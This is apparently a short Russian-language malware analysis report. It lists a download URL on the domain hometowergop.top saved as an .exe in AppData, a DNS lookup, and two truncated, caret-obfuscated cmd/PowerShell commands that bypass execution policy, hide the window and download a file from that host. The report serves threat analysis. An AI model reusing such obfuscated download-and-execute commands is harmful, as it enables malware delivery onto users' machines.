Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^ER^s^HELl.e^xe -^Exec^Uti^ONP^o^L^IC^y bYpAsS^ -nopr^OFIle ^-WIn^d^OWs^tYl^e^ ^HIdDen^ (^New-^o^B^je^C^T SYS^tEm.ne^t.weBC^LIeNT)^.^DO^WnLoADfi^LE('http://hometowergop.top/rea...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "POw^ER^s^HELl.e^xe -^Exec^Uti^ONP^o^L^IC^y bYpAsS^ -nopr^OFIle ^-WIn^d^OWs^tYl^e^ ^HIdDen^ (^New-^o^B^je^C^T SYS^tEm.ne^t.weBC^LIeNT)^.^DO^WnLoADfi^LE('http://hometowergop.top/rea...' (со скрытым окном)